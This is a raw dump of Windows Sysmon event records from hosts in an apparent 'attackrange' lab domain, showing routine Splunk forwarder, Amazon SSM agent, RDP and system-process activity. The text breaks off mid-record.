09:25:14.707{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59558-false10.0.1.12-8000- 23542300x80000000000000001057081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:19.893{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C47EEFA6C00A6C4A082ACE2A5D0FE2,SHA256=8C7A1075885E4DDB455581FF2A5692D080C453584CF827B461DF9C702BBE1B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981552Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:19.929{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=501BF2975EA0D1101260A8C6BBE0630A,SHA256=CA7148B70B3B99AFF1B83A938682E72825AD985259C375505D9612350069E14C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981551Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:19.929{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83345433CED183E983850AE1B2A91C14,SHA256=98C4109F5D4BCB1421FCCC39642936931371740A2CED0DC8E0540F98343AE2B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981550Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:19.632{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3AE1DD32F2E16933C4A80049E8B9021,SHA256=B0C720D9F33A0F34FDE16937627B4CBB3495904D07AA2B09F9A6BACE65EB072F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:20.908{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C4128F27F43F23D5E830CA8FD675195,SHA256=2C3218BA4148BD19CBFB3315188BD9999AEE83778F989ACBE432BD73C1F0F159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981554Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:20.663{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C273F442683630B40CB400E689297A7,SHA256=F8AA28976943B8C2A33171D1BDB8B1AC49593B5D76C4D259485352CD22DB1278,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:19.051{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54264-false169.254.169.254-80http 354300x80000000000000001057084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:18.945{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54263-false169.254.169.254-80http 354300x80000000000000001057083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:18.897{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54262-false169.254.169.254-80http 354300x80000000000000001057082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:18.896{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54261-false169.254.169.254-80http 354300x8000000000000000981553Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:17.199{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59866-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:21.924{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=142C9D7DE5B1FD1430E644CACAEB9C69,SHA256=F052FB6D05BA7ED3320554BC834D80B8CE6CE7C51A45A8ADFECD5EDC717AE880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981557Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:21.695{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C88B4C591FB718CB7B3B2642C663D05B,SHA256=F2A57FA205AB9B527A8870ECA0F1FDC6788FECCF29BC06A8164D92BBF67C23E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:19.992{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54265-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001057089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:19.784{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49837-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:21.143{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FEA4244D5E437AB083785FFB41FF743,SHA256=13B0BEB78C904A4AC50413413DB95E2236F8910316448FBE5C0181D4D1FAB8AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:21.143{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=892B1F435FC6AD803EB3CF23BCECDDF8,SHA256=59DE3D7DC772EC98A7A0D23055F5D272114FA4FEBF2C1C00411B9A6E35D305BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981556Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:18.056{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49532-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981555Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:17.466{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com62952-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:22.955{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=639A7019416E5C35D774C59475924EAE,SHA256=10CA3C2D6144856048491F97A9F8366640C33ACD411957B339E2095BE18A3AB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981558Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:22.929{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE89F6BDC19EC3AA77D54FAC40D5AEF5,SHA256=BFF5125077938FF9C285EB9D971B434EEA43CE9632A582F6B561B75142CAD80A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981561Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:23.964{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB91E31165A992A33F2BF892E3FBFEAB,SHA256=0AF59737FB3D6C2A7F950DECE861A7F12CDB21B3B4B7119BD546AED84C1A4A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981560Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:23.638{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4321MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981559Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:19.863{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59559-false10.0.1.12-8000- 23542300x8000000000000000981563Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:24.978{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A165DD22C7ACDA875A093066B69ED9C2,SHA256=0C2ADF82099A76806356A5E9DADE14BD6A9C55FC92F9EE22F1E677002ADCF238,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:24.877{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-004MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:24.171{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE9EB2F04547F4AB0F6C5B276C75B454,SHA256=CBD8C98165FC3D14E8D6DE7B40515137FF5C811A5E9CD8641AA1B343C298FA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981562Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:24.652{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4322MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981578Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.982{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75F13C34D0CBEC044395C23E84A1BD19,SHA256=D4C826B753CE0E53117503D6EE70223A7ACAB217CCE142DEBFB2022A9DD885B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:25.889{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-005MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:23.742{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63761-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:25.248{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F63460938CEB27DFC121E146B20B58F6,SHA256=330304AB314BF81FF88D3CB743B0947F8A4AAA2E4A8D31D775FB62E5A5F05300,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981577Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.873{69CF5F33-8E05-6151-227A-00000000FD01}9962688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981576Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E05-6151-227A-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981575Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981574Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981573Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981572Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981571Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981570Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981569Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981568Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981567Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981566Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8E05-6151-227A-00000000FD01}996C:\Program 